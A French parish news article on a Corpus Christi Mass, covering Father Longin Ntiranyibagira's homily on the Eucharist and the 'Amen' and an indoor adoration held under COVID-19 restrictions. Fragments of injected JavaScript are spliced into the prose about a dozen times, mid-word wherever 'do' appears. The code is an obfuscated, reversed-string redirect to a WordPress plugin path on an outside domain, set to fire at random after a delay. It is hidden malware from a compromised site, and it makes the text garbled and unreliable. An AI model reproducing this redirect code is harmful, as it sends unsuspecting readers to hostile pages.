La célébration eucharistique de ce Dimanche du Saint Sacrement a été présidée par le Père Longin Ntiranyibagira. La Chorale Sainte Famille a aidé dans l’animation du chant liturgique au cours de la sainte Messe et l’atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doration qui a suivi en replacement de la procession avec le Saint Sacrement qui devrait avoir lieu dans le quartier. Les lectures du jour ont été respectivement tirées du Livre de l’Exode (24,3-8), L’Epitre aux Hébreux (9, 11-15) et l’Evangile selon Saint Marc (14, 12-16).

Dans son homélie, le Père Ntiranyibagira a précisé que nous étions en train de célébrer notre salut et une alliance irremplaçable entre nous et Dieu qui nous toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne la vie éternelle. Après avoir entendu les paroles que Moise venait de leur dire, tout le peuple d’Israël avait répondu en chœur qu’il mettrait en application et observerait tout ce que le Seigneur leur avait prescrit. En disant ‘Amen’ au cours d’une célébration eucharistique, nous acceptons que nous nous rencontrons vraiment au Nom du Père et du Fils et du Saint Esprit et que nous nous engageons à observer ce que les Saintes Ecritures nous demandent de faire.  En faisant un simple exercice de comptage, le Père Ntiranyibagira a fait savoir que nous prononçons et répétons le Amen au moins dix fois pour une seule Messe, dès premier signe de la croix à la bénédiction finale.  Comme nous répétons plusieurs fois ce mot et puisque nous savons ce que nous faisons et disons, demantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dons-nous si nous vivons réellement ce que nous disons ? En célébrant l’eucharistie qui est un sacrifice qui nous lie avec le Dieu Père, nous devrions dire la Amen à ce Dieu qui a accepté d’être notre nourriture spirituelle.

Lors de la création, Dieu avait prévu tout ce toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont l’homme avait besoin comme nourriture corporelle avant que celui-ci ne fût installé dans le jardin d’Eden. Ce même Dieu avait prévu qu’il serait lui-même nourriture spirituelle de l’homme, voici une raison de plus qui nous pousse à rendre grâce à Dieu sans cesse pour ce cadeau spirituel. Cette nourriture ne s’épuise pas, elle est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnée aux bons comme aux mauvais. Nous devons toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc faire attention quant à recevoir cette nourriture parce que la fin pour les deux catégories de personnes diffère : les pieux en reçoivent la vie éternelle au moment où les impies y trouvent la perdition totale. Nous devons toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc faire attention à ne pas toujours communier sans avoir fait un examen de conscience afin de se croire digne de communion. « Comme il ne sera pas possible de faire une procession avec le Saint Sacrement dans nos quartiers suite aux mesures sanitaires d’éviter des rassemblements massifs qui occasionneraient des risques de propagation de la covid-19, nous nous contenterons de l’atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dorations en cette même église et les prêtres passeront entre les rangées en procession avec le Saint Sacrement. Nous sommes sûrs que le Seigneur nous verra avec tous nos soucis », a conclu le Père Longin.

Précisons qu’à la fin de cette Messe, l’atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doration a débuté par l’exposition du Saint Sacrement, celle-ci a été suivie par une atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doration silencieuse, une courte prière de louange, et la procession du Saint Sacrement entre les fidèles. Cette procession a connu six stations bien établies auparavant avec des prières intentionnelles précises à chacune d’elles :

  • Pour l’Eglise et son unité dans la foi, les pasteurs de l’Eglise et la fermeté dans leur apostolat ;
  • Pour les chefs et gouvernants des pays du monde afin qu’ils soient guidés par l’Esprit-Saint dans tout ce qu’ils font pour leurs pays et les bonnes relations entre Etats ;
  • Pour tous les nécessiteux comme les malades, les veuves, les orphelins, les prisonniers, les réfugiés, ceux qui souffrent spirituellement ;
  • Pour la bénédiction des familles en demandant au Seigneur de leur accorder de croître dans l’amour de Dieu, et leur partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner pour toutes les fautes qui sont commise en familles : divorce, dilapidation des bens et autres ;
  • Pour la jeunesse afin que cette catégorie de gens soit digne dans son comportement et lors du choix du type de vie à mener pour un bon avenir de leurs familles, leurs nations et toute l’Eglise ;
  • Pour l’unité et l’entente entre toutes les personnes, fidèles croyants ou pas. Ceci se remarquerait au travail, en familles et partout où l’on visite. Ainsi nous pourrons être de bons apôtres du Christ pour tous.

La bénédiction finale a été toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnée après cette procession en atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doration, c’était à 14h20 minutes. S’il y avait eu procession au quartier comme au temps sans contraintes sanitaires exigeantes, les cérémonies du jour auraient peut-être duré un peu plus de temps.

NYANDWI M.